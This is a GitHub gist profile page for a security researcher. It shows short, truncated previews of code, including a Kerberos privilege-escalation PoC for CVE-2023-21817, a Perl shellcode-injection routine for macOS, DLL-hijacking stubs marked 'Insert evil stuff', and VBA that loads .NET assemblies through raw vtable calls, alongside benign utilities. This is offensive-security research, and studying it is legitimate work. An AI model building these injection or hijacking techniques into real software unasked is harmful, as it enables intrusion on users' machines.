Skip to content

Instantly share code, notes, and snippets.

View monoxgas's full-sized avatar

Nick Landers monoxgas

View GitHub Profile
@monoxgas
monoxgas / urbandoor.cs
Created April 10, 2023 22:58
Minimal PoC code for Kerberos Unlock LPE (CVE-2023-21817)
View urbandoor.cs
using NtApiDotNet;
using NtApiDotNet.Ndr.Marshal;
using NtApiDotNet.Win32;
using NtApiDotNet.Win32.Rpc.Transport;
using NtApiDotNet.Win32.Security.Authentication;
using NtApiDotNet.Win32.Security.Authentication.Kerberos;
using NtApiDotNet.Win32.Security.Authentication.Kerberos.Client;
using NtApiDotNet.Win32.Security.Authentication.Kerberos.Server;
using NtApiDotNet.Win32.Security.Authentication.Logon;
using System;
@monoxgas
monoxgas / EraseTextBoxes.bas
Last active March 14, 2023 16:23 — forked from githubyouser/EraseTextBoxes.bas
Word VBA: Convert text boxes to plain text
View EraseTextBoxes.bas
'https://answers.microsoft.com/en-us/msoffice/forum/all/removing-text-box-from-word-document-without/a4d02b2f-d168-48dc-960b-4a45cbe79d86
Sub ReplaceTextBoxes()
Dim RngDoc As Range, RngShp As Range, i As Long, boundary As String
With ActiveDocument
For i = .Shapes.Count To 1 Step -1
With .Shapes(i)
'If .Type = msoTextBox Then
'https://eileenslounge.com/viewtopic.php?p=28255#p28255
If .TextFrame.HasText = True Then
View keybase.md

Keybase proof

I hereby claim:

  • I am monoxgas on github.
  • I am monoxgas (https://keybase.io/monoxgas) on keybase.
  • I have a public key whose fingerprint is 8138 ABBC 8C08 62A4 1E16 A697 5856 495B 4691 8AB1

To claim this, I am signing this object:

@monoxgas
monoxgas / syscall.pl
Last active January 8, 2022 10:57
Perl syscall/sc injection for MacOS
View syscall.pl
use DynaLoader;
use Devel::Peek;
use Fcntl;
use 5.008001; # because 5.6 doesn't have B::PV::object_2svref
use Config;
use B (); # for B::PV
sub mmap {
my ($addr, $size, $protect, $flags) = @_;
syscall(197, $addr, $size, $protect, $flags, -1, 0);
@monoxgas
monoxgas / extract.cpp
Created May 25, 2021 22:06
MacOS Shared DYLD Cache Extraction (Big Sur)
View extract.cpp
// ref: https://opensource.apple.com/source/dyld/[VERSION]/launch-cache/dsc_extractor.cpp.auto.html
// > SDKROOT=`xcrun --sdk macosx --show-sdk-path`
// > clang++ -o extract extract.cpp
// > mkdir libraries
// > ./extract /System/Library/dyld/dyld_shared_cache_x86_64 `pwd`/libraries/
#include <stdio.h>
#include <stddef.h>
#include <dlfcn.h>
@monoxgas
monoxgas / vc_decrypt.py
Last active July 18, 2023 22:57
VoiceCrypt Crypto
View vc_decrypt.py
import sys
import struct
import binascii
from itertools import cycle, zip_longest
from operator import itemgetter, xor
from collections import Counter
import re
# Some root key constants from the binary
View keybase.md

Keybase proof

I hereby claim:

  • I am monoxgas on github.
  • I am monoxgas (https://keybase.io/monoxgas) on keybase.
  • I have a public key ASCY7hWSUiJvdx6-976NCpVJx_ePWPOc6E3cuJz5PA8dygo

To claim this, I am signing this object:

@monoxgas
monoxgas / main.cpp
Created February 12, 2020 22:19
Adaptive DLL Hijacking - Patching LoadLibrary Return
View main.cpp
#include <Windows.h>
#include <intrin.h>
#include <string>
#include <TlHelp32.h>
#include <psapi.h>
BOOL PatchTheRet(HMODULE realModule) {
// Get primary module info
@monoxgas
monoxgas / main.cpp
Created February 12, 2020 19:27
Adapative DLL Hijacking - Stability Hooking
View main.cpp
#include <Windows.h>
#include <intrin.h>
#include <string>
#include <TlHelp32.h>
#include <psapi.h>
DWORD WINAPI Thread(LPVOID lpParam) {
// Insert evil stuff
ExitProcess(0);
@monoxgas
monoxgas / mscorlib_load_assembly.vba
Last active May 18, 2023 13:30
VBA code for calling AppDomain.Load using raw vtable lookups for the IUnknown
View mscorlib_load_assembly.vba
' Need to add project references to C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscoree.tlb and mscorlib.tlb
Private Declare PtrSafe Function DispCallFunc Lib "oleaut32.dll" (ByVal pv As LongPtr, ByVal ov As LongPtr, ByVal cc As Integer, ByVal vr As Integer, ByVal ca As Long, ByRef pr As Integer, ByRef pg As LongPtr, ByRef par As Variant) As Long
Private Declare PtrSafe Sub RtlMoveMemory Lib "kernel32" (Dst As Any, Src As Any, ByVal BLen As LongPtr)
Private Declare PtrSafe Function VarPtrArray Lib "VBE7" Alias "VarPtr" (ByRef Var() As Any) As LongPtr
#If Win64 Then
Const LS As LongPtr = 8&
#Else
Const LS As LongPtr = 4&